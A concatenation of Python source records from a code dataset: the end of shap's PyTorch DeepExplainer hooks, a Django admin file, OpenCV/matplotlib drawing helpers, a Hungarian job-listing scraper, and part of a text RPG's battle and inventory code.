calculate the multipliers\n \"\"\"\n try:\n del module.x\n except AttributeError:\n pass\n try:\n del module.y\n except AttributeError:\n pass\n module_type = module.__class__.__name__\n if module_type in op_handler:\n func_name = op_handler[module_type].__name__\n # First, check for cases where we don't need to save the x and y tensors\n if func_name == 'passthrough':\n pass\n else:\n # check only the 0th input varies\n for i in range(len(input)):\n if i != 0 and type(output) is tuple:\n assert input[i] == output[i], \"Only the 0th input may vary!\"\n # if a new method is added, it must be added here too. This ensures tensors\n # are only saved if necessary\n if func_name in ['maxpool', 'nonlinear_1d']:\n # only save tensors if necessary\n if type(input) is tuple:\n setattr(module, 'x', torch.nn.Parameter(input[0].detach()))\n else:\n setattr(module, 'x', torch.nn.Parameter(input.detach()))\n if type(output) is tuple:\n setattr(module, 'y', torch.nn.Parameter(output[0].detach()))\n else:\n setattr(module, 'y', torch.nn.Parameter(output.detach()))\n\n\ndef get_target_input(module, input, output):\n \"\"\"A forward hook which saves the tensor - attached to its graph.\n Used if we want to explain the interim outputs of a model\n \"\"\"\n try:\n del module.target_input\n except AttributeError:\n pass\n setattr(module, 'target_input', input)\n\n\ndef passthrough(module, grad_input, grad_output):\n \"\"\"No change made to gradients\"\"\"\n return None\n\n\ndef maxpool(module, grad_input, grad_output):\n pool_to_unpool = {\n 'MaxPool1d': torch.nn.functional.max_unpool1d,\n 'MaxPool2d': torch.nn.functional.max_unpool2d,\n 'MaxPool3d': torch.nn.functional.max_unpool3d\n }\n pool_to_function = {\n 'MaxPool1d': torch.nn.functional.max_pool1d,\n 'MaxPool2d': torch.nn.functional.max_pool2d,\n 'MaxPool3d': torch.nn.functional.max_pool3d\n }\n delta_in = module.x[: int(module.x.shape[0] / 2)] - module.x[int(module.x.shape[0] / 2):]\n dup0 = [2] + [1 for i in delta_in.shape[1:]]\n # we also need to check if the output is a tuple\n y, ref_output = torch.chunk(module.y, 2)\n cross_max = torch.max(y, ref_output)\n diffs = torch.cat([cross_max - ref_output, y - cross_max], 0)\n\n # all of this just to unpool the outputs\n with torch.no_grad():\n _, indices = pool_to_function[module.__class__.__name__](\n module.x, module.kernel_size, module.stride, module.padding,\n module.dilation, module.ceil_mode, True)\n xmax_pos, rmax_pos = torch.chunk(pool_to_unpool[module.__class__.__name__](\n grad_output[0] * diffs, indices, module.kernel_size, module.stride,\n module.padding, list(module.x.shape)), 2)\n\n grad_input = [None for _ in grad_input]\n grad_input[0] = torch.where(torch.abs(delta_in) < 1e-7, torch.zeros_like(delta_in),\n (xmax_pos + rmax_pos) / delta_in).repeat(dup0)\n\n return tuple(grad_input)\n\n\ndef linear_1d(module, grad_input, grad_output):\n \"\"\"No change made to gradients.\"\"\"\n return None\n\n\ndef nonlinear_1d(module, grad_input, grad_output):\n delta_out = module.y[: int(module.y.shape[0] / 2)] - module.y[int(module.y.shape[0] / 2):]\n\n delta_in = module.x[: int(module.x.shape[0] / 2)] - module.x[int(module.x.shape[0] / 2):]\n dup0 = [2] + [1 for i in delta_in.shape[1:]]\n # handles numerical instabilities where delta_in is very small by\n # just taking the gradient in those cases\n grads = [None for _ in grad_input]\n grads[0] = torch.where(torch.abs(delta_in.repeat(dup0)) < 1e-6, grad_input[0],\n grad_output[0] * (delta_out / delta_in).repeat(dup0))\n return tuple(grads)\n\n\nop_handler = {}\n\n# passthrough ops, where we make no change to the gradient\nop_handler['Dropout3d'] = passthrough\nop_handler['Dropout2d'] = passthrough\nop_handler['Dropout'] = passthrough\nop_handler['AlphaDropout'] = passthrough\n\nop_handler['Conv1d'] = linear_1d\nop_handler['Conv2d'] = linear_1d\nop_handler['Conv3d'] = linear_1d\nop_handler['ConvTranspose1d'] = linear_1d\nop_handler['ConvTranspose2d'] = linear_1d\nop_handler['ConvTranspose3d'] = linear_1d\nop_handler['Linear'] = linear_1d\nop_handler['AvgPool1d'] = linear_1d\nop_handler['AvgPool2d'] = linear_1d\nop_handler['AvgPool3d'] = linear_1d\nop_handler['AdaptiveAvgPool1d'] = linear_1d\nop_handler['AdaptiveAvgPool2d'] = linear_1d\nop_handler['AdaptiveAvgPool3d'] = linear_1d\nop_handler['BatchNorm1d'] = linear_1d\nop_handler['BatchNorm2d'] = linear_1d\nop_handler['BatchNorm3d'] = linear_1d\n\nop_handler['LeakyReLU'] = nonlinear_1d\nop_handler['ReLU'] = nonlinear_1d\nop_handler['ELU'] = nonlinear_1d\nop_handler['Sigmoid'] = nonlinear_1d\nop_handler[\"Tanh\"] = nonlinear_1d\nop_handler[\"Softplus\"] = nonlinear_1d\nop_handler['Softmax'] = nonlinear_1d\n\nop_handler['MaxPool1d'] = maxpool\nop_handler['MaxPool2d'] = maxpool\nop_handler['MaxPool3d'] = maxpool\n","repo_name":"shap/shap","sub_path":"shap/explainers/_deep/deep_pytorch.py","file_name":"deep_pytorch.py","file_ext":"py","file_size_in_byte":15383,"program_lang":"python","lang":"en","doc_type":"code","stars":20538,"dataset":"github-code","pt":"68"} +{"seq_id":"23984859470","text":"from django.contrib import admin\nfrom .models import *\n# Register your models here.\n\nadmin.site.site_header = 'Fruit Shop Admin'\nadmin.site.index_title = 'Main Admin'\nadmin.site.site_title = 'Fruit Shop Backend'\n\n\nclass AllProductAdmin(admin.ModelAdmin):\n list_display = ['name', 'price', 'quantity', 'instock']\n list_editable = ['price', 'quantity', 'instock']\n list_filter = ['instock']\n search_fields = ['name']\n\n\nadmin.site.register(AllProduct, AllProductAdmin)\nadmin.site.register(Profile)\nadmin.site.register(Cart)\n\n\nclass OrderListAdmin(admin.ModelAdmin):\n list_display = ['orderId', 'productName', 'total']\n\n\nadmin.site.register(OrderList, OrderListAdmin)\n\n\nclass OrderPendingAdmin(admin.ModelAdmin):\n list_display = ['orderId', 'user', 'paid', 'slip']\n list_filter = ['paid']\n\n\nadmin.site.register(OrderPending, OrderPendingAdmin)\n","repo_name":"plewwoo/fruit-shop","sub_path":"myapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7061364691","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\nimport math\n\n# logging\nfrom logging import getLogger, NullHandler\nlogger = getLogger(__name__)\nlogger.addHandler(NullHandler())\n\n# matplotlib\ntry:\n import matplotlib\n matplotlib.use('Agg')\n import matplotlib.pyplot as plt\n import matplotlib.backends.backend_agg as agg\nexcept Exception as e:\n logger.error('Failed to import matplotlib')\n logger.error('[%s] %s', str(type(e)), str(e.args))\n exit()\n\n\ndef _draw_line(img, pt1, pt2, color, thickness=2):\n pt1 = (int(pt1[0]), int(pt1[1]))\n pt2 = (int(pt2[0]), int(pt2[1]))\n cv2.line(img, pt1, pt2, color, int(thickness))\n\n\ndef _draw_circle(img, pt, color, radius=4, thickness=-1):\n pt = (int(pt[0]), int(pt[1]))\n cv2.circle(img, pt, radius, color, int(thickness))\n\n\ndef _draw_rect(img, rect, color, thickness=2):\n p1 = (int(rect[0]), int(rect[1]))\n p2 = (int(rect[0] + rect[2]), int(rect[1] + rect[3]))\n cv2.rectangle(img, p1, p2, color, thickness)\n\n\ndef _draw_cross(img, pt, color, size=4, thickness=2):\n p0 = (pt[0] - size, pt[1] - size)\n p1 = (pt[0] + size, pt[1] + size)\n p2 = (pt[0] + size, pt[1] - size)\n p3 = (pt[0] - size, pt[1] + size)\n _draw_line(img, p0, p1, color, thickness)\n _draw_line(img, p2, p3, color, thickness)\n\n\ndef _rotation_matrix(rad_x, rad_y, rad_z):\n cosx, cosy, cosz = math.cos(rad_x), math.cos(rad_y), math.cos(rad_z)\n sinx, siny, sinz = math.sin(rad_x), math.sin(rad_y), math.sin(rad_z)\n rotz = np.array([[cosz, -sinz, 0],\n [sinz, cosz, 0],\n [0, 0, 1]], dtype=np.float32)\n roty = np.array([[cosy, 0, siny],\n [0, 1, 0],\n [-siny, 0, cosy]], dtype=np.float32)\n rotx = np.array([[1, 0, 0],\n [0, cosx, -sinx],\n [0, sinx, cosx]], dtype=np.float32)\n return rotx.dot(roty).dot(rotz)\n\n\ndef _project_plane_yz(vec):\n x = vec.dot(np.array([0, 1, 0], dtype=np.float32))\n y = vec.dot(np.array([0, 0, 1], dtype=np.float32))\n return np.array([x, -y], dtype=np.float32) # y flip\n\n\ndef draw_detection(img, detection, size=15):\n # Upper left\n pt = (size + 5, size + 5)\n if detection:\n _draw_circle(img, pt, (0, 0.7, 0), size, 5)\n else:\n _draw_cross(img, pt, (0, 0, 0.7), size, 5)\n\n\ndef draw_landmark(img, landmark, visibility, color, line_color_scale,\n denormalize_scale=True):\n \"\"\" Draw AFLW 21 points landmark\n 0|LeftBrowLeftCorner\n 1|LeftBrowCenter\n 2|LeftBrowRightCorner\n 3|RightBrowLeftCorner\n 4|RightBrowCenter\n 5|RightBrowRightCorner\n 6|LeftEyeLeftCorner\n 7|LeftEyeCenter\n 8|LeftEyeRightCorner\n 9|RightEyeLeftCorner\n 10|RightEyeCenter\n 11|RightEyeRightCorner\n 12|LeftEar\n 13|NoseLeft\n 14|NoseCenter\n 15|NoseRight\n 16|RightEar\n 17|MouthLeftCorner\n 18|MouthCenter\n 19|MouthRightCorner\n 20|ChinCenter\n \"\"\"\n conn_list = [[0, 1], [1, 2], [3, 4], [4, 5], # brow\n [6, 7], [7, 8], [9, 10], [10, 11], # eye\n [13, 14], [14, 15], [13, 15], # nose\n [17, 18], [18, 19], # mouse\n [12, 20], [16, 20]] # face contour\n\n if landmark.ndim == 1:\n landmark = landmark.reshape(int(landmark.shape[-1] / 2), 2)\n assert(landmark.shape[0] == 21 and visibility.shape[0] == 21)\n\n if denormalize_scale:\n h, w = img.shape[0:2]\n size = np.array([[w, h]], dtype=np.float32)\n landmark = landmark * size + size / 2\n\n # Line\n line_color = tuple(v * line_color_scale for v in color)\n for i0, i1 in conn_list:\n if visibility[i0] > 0.5 and visibility[i1] > 0.5:\n _draw_line(img, landmark[i0], landmark[i1], line_color, 2)\n\n # Point\n for pt, visib in zip(landmark, visibility):\n if visib > 0.5:\n _draw_circle(img, pt, color, 4, -1)\n else:\n _draw_circle(img, pt, color, 4, 1)\n\n\ndef draw_pose(img, pose, size=30, idx=0):\n # parallel projection (something wrong?)\n rotmat = _rotation_matrix(-pose[0], -pose[1], -pose[2])\n zvec = np.array([0, 0, 1], np.float32)\n yvec = np.array([0, 1, 0], np.float32)\n xvec = np.array([1, 0, 0], np.float32)\n zvec = _project_plane_yz(rotmat.dot(zvec))\n yvec = _project_plane_yz(rotmat.dot(yvec))\n xvec = _project_plane_yz(rotmat.dot(xvec))\n\n # Lower left\n org_pt = ((size + 5) * (2 * idx + 1), img.shape[0] - size - 5)\n _draw_line(img, org_pt, org_pt + zvec * size, (1, 0, 0), 3)\n _draw_line(img, org_pt, org_pt + yvec * size, (0, 1, 0), 3)\n _draw_line(img, org_pt, org_pt + xvec * size, (0, 0, 1), 3)\n\n\ndef draw_gender(img, gender, size=7, idx=0):\n # Upper right\n pt = (img.shape[1] - (size + 5) * (2 * idx + 1), size + 5)\n if gender == 0:\n _draw_circle(img, pt, (1.0, 0.3, 0.3), size, -1) # male\n elif gender == 1:\n _draw_circle(img, pt, (0.3, 0.3, 1.0), size, -1) # female\n\n\ndef draw_gender_rect(img, gender, rect):\n if gender == 0:\n _draw_rect(img, rect, (1.0, 0.3, 0.3)) # male\n elif gender == 1:\n _draw_rect(img, rect, (0.3, 0.3, 1.0)) # female\n\n\ndef draw_loss_graph(train_loss_list, test_loss_list, train_epoch_list=None,\n test_epoch_list=None, train_color='blue', test_color='red',\n legend_loc='upper right', title=None):\n # Axis data\n # Losses\n train_loss = np.asarray(train_loss_list)\n test_loss = np.asarray(test_loss_list)\n # Epochs\n if train_epoch_list:\n train_epoch = np.asarray(train_epoch_list)\n else:\n train_epoch = np.arange(0, len(train_loss_list))\n if test_epoch_list:\n test_epoch = np.asarray(test_epoch_list)\n else:\n test_epoch = np.arange(0, len(test_loss_list))\n\n # Create new figure\n plt.clf()\n fig, ax = plt.subplots()\n ax.plot(train_epoch, train_loss, label='train', color=train_color)\n ax.plot(test_epoch, test_loss, label='test', color=test_color)\n\n def draw_annotate(label, x, y, color):\n ax.scatter(x, y, 20, color=color)\n ax.annotate(label, xy=(x, y), xytext=(+20, +10),\n textcoords='offset points',\n arrowprops={'arrowstyle': '->',\n 'connectionstyle': 'arc3,rad=.2'})\n\n # Show min values\n if train_loss.shape[0] > 0:\n min_idx = np.argmin(train_loss)\n x, y = train_epoch[min_idx], train_loss[min_idx]\n draw_annotate('min train loss: %0.3f' % y, x, y, train_color)\n if test_loss.shape[0] > 0:\n min_idx = np.argmin(test_loss)\n x, y = test_epoch[min_idx], test_loss[min_idx]\n draw_annotate('min test loss: %0.3f' % y, x, y, test_color)\n\n # Settings\n ax.set_xlabel(\"epoch\")\n ax.set_ylabel(\"loss rate\")\n ax.set_xlim(left=0)\n ax.set_ylim(bottom=0)\n ax.legend(loc=legend_loc)\n if title is not None:\n ax.set_title(title)\n\n # Draw\n canvas = agg.FigureCanvasAgg(fig)\n canvas.draw()\n renderer = canvas.get_renderer()\n img = np.fromstring(renderer.tostring_rgb(), dtype=np.uint8, sep='')\n img = img.reshape(canvas.get_width_height()[::-1] + (3,))\n\n # Close\n plt.close('all')\n\n return img\n","repo_name":"takiyu/hyperface","sub_path":"scripts/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":7290,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"68"} +{"seq_id":"39611341226","text":"# -*- coding: utf-8 -*-\n\nimport logging\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport click\nimport requests\nimport sqlalchemy\nimport xlsxwriter\nfrom bs4 import BeautifulSoup\nfrom sqlalchemy import create_engine, delete, insert, select\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm.session import Session, sessionmaker\nfrom unidecode import unidecode\n\nfrom models import Base, JobModel\n\n\nAPP_DIR = Path(__file__).parent\nlog = logging.getLogger()\n\n\n@click.command()\n@click.option(\n \"--keyword\",\n default=\"python fejlesztő\",\n help=\"the search term. can be multiple words\",\n)\n@click.option(\n \"--output\",\n default=\"profession_hu_jobs__\"\n + str(datetime.now()).replace(\" \", \"_\").replace(\":\", \"_\").replace(\".\", \"_\"),\n help=\"output file name\",\n)\n@click.option(\"--pages-to-check\", default=50, help=\"number of pages to check\")\n@click.option(\n \"--save-to-xlsx\", default=False, show_default=True, help=\"save to excel sheet\"\n)\ndef main(output, pages_to_check, save_to_xlsx, keyword):\n my_jobs_data = search_and_process(pages_to_check, keyword)\n if save_to_xlsx:\n export_to_xlsx(my_jobs_data, output)\n save_to_db(my_jobs_data, output, keyword)\n\n\ndef search_and_process(pages, keyword):\n keyword = \"\".join([c if c != \" \" else \"%20\" for c in keyword])\n page_number = 1\n\n positions = []\n urls = []\n companies = []\n addresses = []\n salaries = []\n added_ats = []\n\n print(\"collecting data: \", end=\"\", flush=True)\n log.info(\"data collection started\")\n\n while page_number <= pages:\n url = f\"https://www.profession.hu/allasok/{page_number},0,0,{keyword}%401%401?keywordsearch\"\n log.info(f\"url: {unidecode(url)}\")\n\n print(\".\", end=\"\", flush=True)\n page = requests.get(url)\n soup = BeautifulSoup(page.content, \"html.parser\")\n all_cards = soup.find_all(class_=\"card\")\n\n for card in all_cards:\n try:\n position = card.find(class_=\"job-card__title\").get_text().strip()\n url = card.select(\"h2 a\")\n\n company = (\n card.find(class_=\"job-card__company-name\")\n .get_text()\n .strip()\n .replace('\"', \"\")\n )\n\n address = (\n card.find(class_=\"job-card__company-address\").get_text().strip()\n )\n\n salary = card.select(\".bonus_salary > dd:nth-child(2)\")\n if salary:\n salary = salary[0].text\n else:\n salary = \"\"\n\n added_at = (\n str(datetime.now())\n .replace(\" \", \"_\")\n .replace(\":\", \"_\")\n .replace(\".\", \"_\")\n )\n\n if company.lower() not in [\n \"randstad hungary kft.\",\n \"tech people hungary kft.\",\n ]:\n positions.append(position.splitlines()[0])\n urls.append(url[0][\"href\"])\n companies.append(company)\n addresses.append(address)\n salaries.append(salary)\n added_ats.append(added_at)\n\n except:\n continue\n\n page_number += 1\n log.info(\"page parsed\")\n\n jobs_data = {\n \"positions\": positions,\n \"urls\": urls,\n \"companies\": companies,\n \"addresses\": addresses,\n \"salaries\": salaries,\n \"added_ats\": added_ats,\n }\n\n return jobs_data\n\n\ndef export_to_xlsx(jobs_data, output):\n log.info(\"export to xlsx started\")\n out_file = f\"{output}.xlsx\"\n\n print(f\"creating excel file: {out_file} ->\", end=\" \")\n headers = [\"position\", \"company\", \"address\", \"salary\", \"url\"]\n\n wb = xlsxwriter.Workbook(out_file)\n ws = wb.add_worksheet()\n ws.set_column(\"A:C\", 35)\n ws.set_column(\"D:E\", 12)\n ws.set_default_row(20)\n ws.set_zoom(100)\n row = 1\n\n cf = wb.add_format()\n cf.set_font_size(10)\n cf.set_align(\"vcenter\")\n cf.set_bold(True)\n\n for i in range(len(headers)):\n ws.write_string(0, i, headers[i], cf)\n\n for x in range(len(jobs_data[\"positions\"])):\n cf = wb.add_format()\n cf.set_font_size(9)\n cf.set_align(\"vcenter\")\n\n ws.write_string(row, 0, jobs_data[\"positions\"][x], cf)\n ws.write_string(row, 1, jobs_data[\"companies\"][x], cf)\n ws.write_string(row, 2, jobs_data[\"addresses\"][x], cf)\n ws.write_string(row, 3, jobs_data[\"salaries\"][x], cf)\n ws.write_url(row, 4, jobs_data[\"urls\"][x], cf, string=jobs_data[\"urls\"][x])\n row += 1\n wb.close()\n log.info(\"export to xlsx done\")\n\n\ndef save_to_db(jobs_data, output, keyword):\n my_sqlops = SqlOps(jobs_data, keyword)\n my_sqlops.sql_add()\n\n\nclass SqlOps(object):\n def __init__(\n self,\n jobs_data,\n keyword,\n ):\n self.conn_string = f\"sqlite:///{keyword}.sqlite3\"\n self.engine = create_engine(self.conn_string)\n self.jobs_data = jobs_data\n\n def sql_add(self):\n Base.metadata.create_all(self.engine)\n\n new_jobs = []\n rollback = False\n for i in range(0, len(self.jobs_data[\"positions\"])):\n try:\n\n Session = sessionmaker(bind=self.engine)\n session = Session()\n\n job = JobModel(\n position=self.jobs_data[\"positions\"][i],\n company=self.jobs_data[\"companies\"][i],\n address=self.jobs_data[\"addresses\"][i],\n salary=self.jobs_data[\"salaries\"][i],\n url=self.jobs_data[\"urls\"][i],\n added_at=self.jobs_data[\"added_ats\"][i],\n )\n session.add(job)\n session.commit()\n except IntegrityError as e:\n log.error(e)\n session.rollback()\n rollback = True\n finally:\n session.close()\n\n if not rollback:\n new_jobs.append(\n [\n self.jobs_data[\"positions\"][i],\n self.jobs_data[\"companies\"][i],\n self.jobs_data[\"addresses\"][i],\n self.jobs_data[\"salaries\"][i],\n self.jobs_data[\"urls\"][i],\n self.jobs_data[\"added_ats\"][i],\n ]\n )\n\n print(\"\\nnew jobs:\")\n for new_job in new_jobs:\n print(\"new job:\", new_job)\n\n\nif __name__ == \"__main__\":\n handler = logging.FileHandler(APP_DIR / \"scraper.log\")\n formatter = logging.Formatter(\"%(asctime)s %(name)-12s %(levelname)-8s %(message)s\")\n handler.setFormatter(formatter)\n log.addHandler(handler)\n log.setLevel(logging.DEBUG)\n\n main()\n","repo_name":"polyspastos/profession_hu_scraper","sub_path":"profession_hu_scraper/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":6886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74895906135","text":"from main import *\nfrom items import *\nfrom skills import *\nfrom mobs import *\nimport random\n\nlowkey_lvl = 0\n\n\n# Basic commands\ndef commands(comm):\n global lowkey_lvl\n if in_battle == 0:\n if comm == \"inventory\" or comm == \"inv\":\n check_inv()\n elif comm == \"skill\" or comm == \"skills\":\n check_skill()\n elif comm == \"stats\" or comm == \"stat\":\n check_stats()\n elif comm == \"equip\" or comm == \"eq\":\n equip()\n # DELETE LVLUP COMM\n elif comm == \"lvlup\":\n if int(p_exp) >= int(level_threshold[lowkey_lvl]):\n lowkey_lvl += 1\n print(\"LEVEL UP!\")\n lvlup()\n print(\"\")\n else:\n print(f\"You need {int(level_threshold[lowkey_lvl]) - int(p_exp)} more EXP to level up!\")\n print(\"\")\n elif comm == \"battle\":\n battle()\n elif comm == \"randomloot\":\n randomloot()\n elif comm == \"uskill\":\n use_skill()\n elif comm == \"sell\":\n sell()\n elif comm == \"show\":\n show()\n elif comm == \"info\":\n info()\n elif comm == \"about\":\n about()\n\n\n# Check inventory\ndef check_inv():\n i = 0\n for item in inventory:\n print(f\"{i}. {item}\")\n i += 1\n print(f\"{p_gold} Gold\")\n name = input(\"Item Name: >> \")\n if name in inventory:\n if name in items[\"Weapons\"] and name in inventory:\n wName = items[\"Weapons\"][name][\"Name\"]\n wDamage = items[\"Weapons\"][name][\"Damage\"]\n wPrice = items[\"Weapons\"][name][\"Price\"]\n\n print(f\"Name: {wName}\\nDamage: {wDamage}\\nPrice: {wPrice}\")\n elif name in items[\"Shields\"] and name in inventory:\n sName = items[\"Shields\"][name][\"Name\"]\n sDefense = items[\"Shields\"][name][\"Defense\"]\n sPrice = items[\"Shields\"][name][\"Price\"]\n\n print(f\"Name: {sName}\\nDefense: {sDefense}\\nPrice: {sPrice}\")\n elif name in items[\"Armors\"] and name in inventory:\n aName = items[\"Armors\"][name][\"Name\"]\n aDefense = items[\"Armors\"][name][\"Defense\"]\n aPrice = items[\"Armors\"][name][\"Price\"]\n\n print(f\"Name: {aName}\\nDefense: {aDefense}\\nPrice: {aPrice}\")\n\n else:\n return\n else:\n return\n\n\n# Check available skills\ndef check_skill():\n i = 0\n for skill in p_skills:\n print(f\"{i}. {skill}\")\n i += 1\n skill = input(\"Skill Name: >> \")\n\n if skill in p_skills and skill in skills:\n skill_mult = skills[skill][\"Damage_Multiplier\"]\n skill_cost = skills[skill][\"Stamina_Cost\"]\n print(f\"Skill: {skill}\\nDamage Multiplier: {skill_mult}\\nStamina Cost: {skill_cost}\")\n else:\n print(\"Skill not learned, or exists\")\n\n\n# Show stats\ndef check_stats():\n combined_defense = p_defense + p_eqADefenseNum[0] + p_eqSDefenseNum[0]\n\n print(f\"Player EXP: {p_exp} | Level: {p_level}\")\n print(f\"Player Max Health: {p_health_max}HP ({p_vitality * 2.5}HP from Vitality)\")\n print(f\"Player Health: {p_health_current}HP\")\n print(f\"Damage: {p_eqWPowerNum[0]} ({p_eqWeapon[0]})\")\n print(f\"Strength: {p_strength} STR\")\n print(f\"Vitality: {p_vitality} VIT\")\n print(f\"Stamina: {p_stamina} STA\")\n print(f\"Defense: {combined_defense} DEF ({p_eqArmor[0]} + {p_eqADefenseNum[0]} | {p_eqShield[0]} + {p_eqSDefenseNum[0]} | Base + {p_defense})\")\n print(f\"Critical Multiplier: {p_critmulti}x\")\n\n\n# Roll the dice for BATTLES\ndef rtd():\n global p_health_current\n global en_hp\n dice1 = random.randint(1, 6)\n dice2 = random.randint(1, 6)\n self_flagellation = random.randint(2, 5)\n combined_str = dice1 + dice2 + (p_strength * 0.5) + p_eqWPowerNum[0]\n flag_combined = (p_eqWPowerNum[0] + p_strength) / self_flagellation\n print(dice1, dice2)\n if dice1 == 1 or dice2 == 1:\n if dice1 == 1 and dice2 == 1:\n print(\"Aw snap! Weak Hands\")\n print(f\"You hurt yourself for {flag_combined} points of Damage\")\n print(\"\")\n p_health_current -= flag_combined\n return p_health_current\n else:\n print(f\"Your attack has missed the {en_name[0]}\")\n print(\"\")\n elif dice1 == dice2:\n print(\"Critical Hit!\")\n print(f\"You hit {en_name[0]} for {combined_str*p_critmulti} points of Damage\")\n print(\"\")\n en_hp[0] -= combined_str*p_critmulti\n else:\n print(f\"You hit for {combined_str} points of Damage\")\n print(\"\")\n en_hp[0] -= combined_str\n\n\ndef en_rtd():\n global p_health_current\n global en_str, en_sta\n dice1 = random.randint(1, 6)\n dice2 = random.randint(1, 6)\n skill_dice = random.randint(1, 12)\n self_flagellation = (dice1 + dice2 + (en_str[0] * 0.5)) / 2\n enemy_dmg = (dice1 + dice2 + en_str[0]) - p_totalDefense\n reduced_dmg = (dice1 + dice2 + en_str[0]) - p_totalDefense\n print(f\"Enemy has RTD'd {dice1} and {dice2}!\")\n if dice1 == 1 or dice2 == 1:\n if dice1 == 1 and dice2 == 1:\n print(f\"The {en_name[0]} is confused and hit itself for {self_flagellation}\")\n print(\"\")\n en_hp[0] -= self_flagellation\n return en_hp\n else:\n print(f\"{en_name[0]} has missed it's attack!\")\n print(\"\")\n elif dice1 == dice2:\n if reduced_dmg <= 0:\n print(f\"{en_name[0]} has Criticaly Hit you for 0 points of damage! (reduced by {p_totalDefense})\")\n print(\"\")\n p_health_current -= 0\n else:\n print(f\"{en_name[0]} has Criticaly Hit you for {reduced_dmg*1.6} points of damage! (reduced by {p_totalDefense})\")\n print(\"\")\n p_health_current -= reduced_dmg * 1.6\n return p_health_current\n else:\n if reduced_dmg <= 0:\n print(f\"{en_name[0]} hits you for 0 points of damage! (reduced by {p_totalDefense})\")\n print(\"\")\n p_health_current -= 0\n else:\n print(f\"{en_name[0]} hits you for {reduced_dmg} points of damage! (reduced by {p_totalDefense})\")\n print(\"\")\n p_health_current -= enemy_dmg\n return p_health_current\n\n\n# Use available skill\ndef use_skill():\n global p_stamina\n global p_stamina_max\n dice1 = random.randint(1, 6)\n dice2 = random.randint(1, 6)\n i = 0\n sta_cost = []\n skill_damage = []\n for skill in p_skills:\n skill_cost = skills[skill][\"Stamina_Cost\"]\n sk_damage = skills[skill][\"STR_Multiplier\"]\n print(f\"{i}. {skill} - Costs {skill_cost} STA per use\")\n sta_cost.append(skill_cost)\n skill_damage.append(sk_damage)\n i += 1\n print(f\"You have {p_stamina} / {p_stamina_max} Stamina\")\n\n try:\n try:\n use = int(input(\"Which skill you want to use?: >> \"))\n print(use)\n if p_skills[use] in p_skills:\n dmg_cnt = (dice1 + dice2 + p_eqWPowerNum[0] + (p_strength * 0.5)) * skill_damage[use]\n if p_stamina < sta_cost[use]:\n print(\"Not enough Stamina!\")\n print(\"\")\n use_skill()\n else:\n print(f\"Using {p_skills[use]} for {sta_cost[use]} Stamina point/s!\")\n print(f\"{p_skills[use]} dealt {dmg_cnt} points of damage to {en_name[0]}\")\n print(\"\")\n en_hp[0] -= dmg_cnt\n p_stamina -= sta_cost[use]\n return en_hp[0], p_stamina\n except ValueError:\n print(\"No such Skill in your Skill List!\")\n print(\"\")\n use_skill()\n except IndexError:\n print(\"No such Skill in your Skill List!\")\n print(\"\")\n use_skill()\n\n\ndef use_item():\n global p_health_current\n global p_stamina\n global p_eqWPowerNum\n global consumables_quant\n print(\"\")\n i = 0\n q_items = []\n hp_restore = []\n sta_restore = []\n dmg_mult = []\n desc = []\n for item in consumables:\n hp_restore.append(items[\"Consumables\"][item][\"HP_Restore\"])\n sta_restore.append(items[\"Consumables\"][item][\"STA_Restore\"])\n dmg_mult.append(items[\"Consumables\"][item][\"Damage_Multiplier\"])\n desc.append(items[\"Consumables\"][item][\"Desc\"])\n quant = consumables_quant[item][\"quant\"]\n print(f\"{i}. {item} {quant}x - {desc[0]}\")\n q_items.append(quant)\n i += 1\n\n print(\"\")\n use = int(input(\"Which item you want to use? >> \"))\n if consumables[use] in consumables:\n p_health_current += hp_restore[use]\n p_stamina += sta_restore[use]\n p_eqWPowerNum[0] += (p_eqWPowerNum[0] / 100) * 0.25\n hp_restore.clear()\n sta_restore.clear()\n dmg_mult.clear()\n desc.clear()\n consumables.pop(use)\n\n print(\"\")\n return p_health_current, p_stamina, p_eqWPowerNum, consumables_quant\n else:\n hp_restore.clear()\n sta_restore.clear()\n dmg_mult.clear()\n desc.clear()\n print(f\"Such item does not exist in your inventory\")\n\n\n\n print(\"\")\n\n# Equip item from inventory\ndef equip():\n select = int(input(\"Weapon[1], Armor[2], Shield[3]: >> \"))\n print(\"\")\n eq_me = []\n i = 0\n if select == 1:\n for item in items[\"Weapons\"]:\n if item in inventory:\n eq_me.append(item)\n inventory.pop()\n\n for item in eq_me:\n print(f\"{i}. {item}\")\n i += 1\n try:\n equip = input(\"Choose number of item to equip: >> \")\n print(\"\")\n eq_int = int(equip)\n equip_name = eq_me[eq_int]\n if equip_name in eq_me:\n p_eqWeapon.pop()\n p_eqWeapon.append(equip_name)\n p_eqWPowerNum.pop()\n p_eqWPower = items[\"Weapons\"][p_eqWeapon[0]][\"Damage\"]\n p_eqWPowerNum.append(p_eqWPower)\n for item in eq_me:\n inventory.append(item)\n print(f\"You equipped {eq_me[eq_int]}\")\n print(\"\")\n eq_me.clear()\n else:\n print(\"No such weapon with that name\")\n print(\"\")\n except IndexError:\n print(\"No such weapon with that name!\")\n print(\"\")\n\n if select == 2:\n for item in items[\"Armors\"]:\n if item in inventory:\n eq_me.append(item)\n\n for item in eq_me:\n print(f\"{i}. {item}\")\n i += 1\n try:\n equip = input(\"Choose number of item to equip: >> \")\n print(\"\")\n eq_int = int(equip)\n equip_name = eq_me[eq_int]\n if equip_name in eq_me:\n p_eqArmor.pop()\n p_eqArmor.append(equip_name)\n p_eqADefenseNum.pop()\n p_eqADefense = items[\"Armors\"][p_eqArmor[0]][\"Defense\"]\n p_eqADefenseNum.append(p_eqADefense)\n print(f\"You equipped {eq_me[eq_int]} with {p_eqADefenseNum[0]} defense\")\n print(\"\")\n return p_eqADefense\n else:\n print(\"No such armor with that name!\")\n print(\"\")\n except IndexError:\n print(\"No such armor with that name!\")\n print(\"\")\n\n if select == 3:\n for item in items[\"Shields\"]:\n if item in inventory:\n eq_me.append(item)\n\n for item in eq_me:\n print(f\"{i}. {item}\")\n i += 1\n try:\n equip = input(\"Choose number of item to equip: >> \")\n print(\"\")\n eq_int = 